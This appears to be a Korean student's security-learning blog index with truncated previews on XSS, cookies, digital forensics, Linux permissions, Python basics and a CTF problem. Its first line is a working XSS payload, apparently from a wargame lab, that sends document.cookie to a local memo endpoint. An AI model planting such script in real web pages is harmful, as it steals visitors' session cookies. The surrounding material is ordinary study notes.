test <script>location.href="http://127.0.0.1:8000/memo?memo="+document.cookie;</script>

XSS란? Cross Site Scripting의 약자로, 공격자가 웹 사이트에 클라이언트 측에서 실행될 수 있는 스크립트를 삽입할 수 있는 취약점이다. XSS의 종류 Stored XSS : 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS Reflected XSS : 스크립트가 URL에 삽입되고 서버의 응답에...

문제 설명 랜덤한 2개의 숫자를 더한 결과가 입력 값과 일치하는지 확인하는 과정을 50번 반복하는 프로그램입니다. 모두 일치하면 flag 파일에 있는 플래그를 출력합니다. 알맞은 값을 입력하여 플래그를 획득하세요. 문제 파일 // Name: chall.c // Compile Option: gcc chall.c -o chall -fno-stack-p...

1. 추상화 추상화 : 이해하기 쉽게 단순화하는 모든 작업. 1-1 문제 분석 현재 상태 : 문제가 해결되지 않은 상태 목표 상태 : 문제가 해결된 상태 문제를 서로 다르게 인식하는 이유는? 고려해야 할 조건을 서로 다르게 판단했기 때문. 문제는 현재 상태와 조건 등을 고려하여 정확하고 간결하게 정의하는 것이 중요. 1-2 문...

입력문 끝문자와 구분자 끝문자(end) : 줄 바꿈 대신 문자 추가 # 예시 print('2410819', end='@') print('dongsung.hs.kr') # 출력 : 2410819@dongsung.hs.kr 구분자(sep) : 객체 사이를 구분하여 문자 추가 # 예시 print('b', 'n', 'n', '', sep=...

디지털 포렌식이란 디지털 환경에서 흔적을 통해 진실로 입증하는 수사기법을 말한다. 디지털 포렌식의 분야 디스크 포렌식 : 물리적인 저장장치(하드디스크)를 분석 시스템 포렌식 : 운영체제, 응용 프로그램 및 프로세스를 분석 네트워크 포렌식 : 네트워크를 통하여 전송되는 데이터 등을 분석 인터넷 포렌식 : WWW, FTP 등 인터넷 응...

변수와 연산자 변수 변수 : 변할 수 있는 값을 저장하는 공간 변수 초기화 : 변수에 값을 저장하는 것 (ex : a = 10) # 변수에 데이터 저장하기 name = '윤태우' age = 17 # 여러 개의 변수를 초기화하기 a, b = 10, 20 변수의 규칙 명령어는 변수로 사용 금지 (ex : print, input, e...

쿠키 쿠키(Cookie)는 Key와 Value로 이루어진 일종의 단위로, 서버가 클라이언트에게 쿠키를 발급하면, 클라이언트는 서버에 요청을 보낼 때마다 쿠키를 같이 전송한다. 서버는 쿠키를 확인해 클라이언트를 구분할 수 있다. HTTP 프로토콜의 비연결성과 무상태 특징 때문에 웹 서버는 클라이언트를 기억할 수 없다. HTTP에서 상태를 유지하기 위해...

UID와 GID 리눅스에서 각 유저는 이름과 고유한 사용자 ID(UID)를 가지고 있다. 그룹은 여러 유저가 속할 수 있는 그룹으로, 이름과 고유한 그룹 ID(GID)를 가지고 있다. 파일이나 디렉토리같은 시스템 자원에 유저가 접속하면 유저의 UID와 해당 유저가 속한 그룹의 GID를 확인해 권한을 갖고 있는지 판단해 접근을 제어한다. 각 파일과 ...

초기 컴퓨터 과학자 중 한명인 폰 노이만은 컴퓨터에 연산, 제어, 저장의 세 가지 핵심 기능이 필요하다고 생각했다. 초기 컴퓨터 과학자 폰 노이만은 세 가지 핵심 기능(연산, 제어, 저장)이 필요하다고 생각했다. 근대의 컴퓨터는 연산과 제어를 위해 중앙처리장치(Central Processing Unit, CPU) 를, 저장을 위해 기억장치(memo...